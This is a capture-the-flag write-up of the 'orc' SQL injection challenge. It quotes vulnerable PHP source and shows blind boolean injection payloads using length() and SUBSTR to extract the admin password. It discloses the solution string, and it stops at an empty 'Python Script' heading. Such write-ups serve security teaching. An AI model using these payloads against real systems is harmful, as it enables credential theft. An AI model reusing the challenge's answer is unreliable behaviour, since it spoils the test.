Orc

Code

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~"); 
  $query = "select id from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello admin</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_orc where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("orc"); 
  highlight_file(__FILE__); 
?>

Line 5: preg_match filters the string "prob", underscores, periods, and parenthesis.

Line 12: Query obtains a user-supplied value and assigns it to "pw",

Line 14: Then compares the user-supplied value to the "pw" value stored for the 'admin' user. If they are equal, the challenge will be solved.

Query

Testing

Vulnerable parameter is "pw".

pw=' OR id='admin' returns "Hello admin" indicating a true statement.

Using "length"

The length of the string stored in "pw" can be derived using "length".

pw=' OR id='admin' AND length(pw)=1%23 returns nothing, indicating a false statement.

Incrementing the value sequentially eventually results in:

pw=' OR id='admin' AND length(pw)=8%23

which returns "Hello admin" indicating a true statement indicating the string is 8 characters long.

Using "SUBSTR"

By using "SUBSTR" the stored value can be guessed 1 character at a time.

pw=' OR id='admin' AND SUBSTR(pw, 1, 1)=0%23

• id='admin': This part is setting the id parameter to the value 'admin'.

• AND: Logical operator used to combine conditions in a SQL WHERE clause.

• SUBSTR(pw, 1, 1)=0: This part is checking whether the first character of the pw (password) field is equal to 0.

• %23: This is URL-encoded #.

In order to derive the stored value, each character can be enumerated individually by checking if the character in each start position is equal to a character in the charset: a-z0-9. Special characters should be included, but for the purpose of this challenge only alphanumeric is used.

This is a tedious process.

Previously it was discovered that the stored string is 8 characters long so the process will need to be done 8 times, once for each character.

Steps

Checking if the first character of stored value is equal to 0. pw=' OR id='admin' AND SUBSTR(pw, 1, 1)=0%23 returns "Hello admin" : True

2nd character is equal to '9'. pw=' OR id='admin' AND SUBSTR(pw, 2, 1)=9%23

3rd character is equal to '5'. pw=' OR id='admin' AND SUBSTR(pw, 3, 1)=5%23

4th character is equal to 'a'. pw=' OR id='admin' AND SUBSTR(pw, 4, 1)=a%23

5th character is equal to '9' pw=' OR id='admin' AND SUBSTR(pw, 5, 1)=9%23

6th character is equal to '8' pw=' OR id='admin' AND SUBSTR(pw, 6, 1)=8%23

7th character is equal to '5' pw=' OR id='admin' AND SUBSTR(pw, 7, 1)=5%23

8th character is equal to '2' pw=' OR id='admin' AND SUBSTR(pw, 8, 1)=2%23

Incrementing the start position as each character is guessed eventually reveals the value stored of 095a9852.

Finally, the challenge is solved with: pw=095a9852

Effective Query

Python Script